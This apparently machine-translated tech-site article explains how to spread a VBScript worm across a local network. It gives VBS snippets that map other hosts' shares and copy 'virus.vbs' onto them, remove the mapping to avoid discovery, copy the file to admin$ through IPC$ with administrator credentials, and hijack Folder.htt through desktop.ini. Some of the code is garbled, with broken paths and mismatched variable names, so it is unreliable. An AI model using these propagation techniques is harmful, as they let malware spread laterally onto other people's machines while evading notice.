Shulou(Shulou.com)06/03 Report--

This article introduces the relevant knowledge of "how to use the MapNetworkDrive method in WSH to spread the script worm". In the operation of actual cases, many people will encounter this dilemma, so let the editor lead you to learn how to deal with these situations. I hope you can read it carefully and be able to achieve something!

1. Use the MapNetworkDrive method in WSH. The method is to map the network drive to the local.

MapNetworkDrive method:

Object.MapNetworkDrive (strLocalName, strRemoteName, [bUpdateProfile], [strUser], [strPassword])

Parameters.

Object

WshNetwork object.

StrLocalName

A string value that represents the local place name of the mapped drive.

StrRemoteName

A string value that represents the UNC name of the share (\\ xxx\ yyy).

BUpdateProfile

Optional. A Boolean value indicating whether the mapping information is stored in the current user profile. If the value of the bUpdateProfile provided is true, the mapping is stored in the user's profile (the default is false).

StrUser

Optional. A string value that represents the user name. If you use the credentials of a user other than the current user to map the network drive, you must provide this parameter.

StrPassword

Optional. A string value that represents the user's password. If you use the credentials of a user other than the current user to map the network drive, you must provide this parameter.

Description

An error will occur when you try to map a network drive that is not shared.

The main principle is: after getting the LAN address of this machine (usually 192.168.room.*), map the shared directory of other hosts to a local drive (such as Z:), and then copy the virus to the mapped local drive, so as to copy the virus to the directory of other hosts. Finally, use the RemoveNetworkDrive method to remove the mapping so as not to be discovered.

RemoveNetworkDrive method:

Object.RemoveNetworkDrive (strName, [bForce], [bUpdateProfile])

Parameters.

Object

WshNetwork object.

StrName

A string value that represents the mapped drive name to delete. The strName parameter can be either a local name or a remote name, depending on how the drive is mapped.

BForce

Optional. Indicates whether the Boolean value of the mapped drive is forcibly deleted. If the value of the supplied bForce is true, the method deletes these connections regardless of whether the resource is in use or not.

BUpdateProfile

Optional. Indicates whether the mapped string value is deleted from the user's profile. If bUpdateProfile is provided and its value is true, the mapping is removed from the user profile. The default value for bUpdateProfile is false.

Description

If there is a mapping between the local name (drive name) and the remote name (UNC name), strName must be set to the local name. If the local name (drive letter) mapping does not exist in the network path, strName must be set to the remote name.

I'll give you a sample code for VBS:

Set myfso= CreateObject ("Scripting.FileSystemObject")

Set WshNetwork = WScript.CreateObject ("WScript.Network")

WshNetwork.MapNetworkDrive "I:", "\" & unc

Fso.copyfile "c:\ virus.vbs", "I:\ virus.vbs.txt"

WshNetwork.RemoveNetworkDrive "I:"

2. Use IPC$ to connect. This way is estimated to be familiar to friends who play HACK! The principle is to use WSCRIPT.SHELL to execute. For more information, please refer to various IPC$ attack fool tutorials. Only one code is provided here:

Set objshell=wscript.createobject ("wscript.shell")

Dim st,sc

St= "net use\" & "192.168.0.1\ IPC$" & pass & "/" & "administrator"

Objshell.run st

Sc= "copy c:\ virus.vbs\\ 192.168.0.1\ admin$"

Objshell.run sc

3. Just like the New Happy hour virus, it uses the passive form of FOLDER.HTT to spread.

Desktop.ini: profile for the active desktop

Desktop.ini defines the display style of the folder in which it is located on the desktop or in Explorer, as well as some properties of the folder.

Key: WebViewTemplate.NT5= file://Folder.htt

Is to modify the desktop.ini to point to the folder.htt in the same directory, and when you open the folder in WEB view, folder.htt will be executed according to the settings in desktop.ini. In this way, we can write the virus to folder.htt and make it replicate constantly.

This is the end of the content of "how to use the MapNetworkDrive method in WSH to spread the script worm". Thank you for reading. If you want to know more about the industry, you can follow the website, the editor will output more high-quality practical articles for you!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.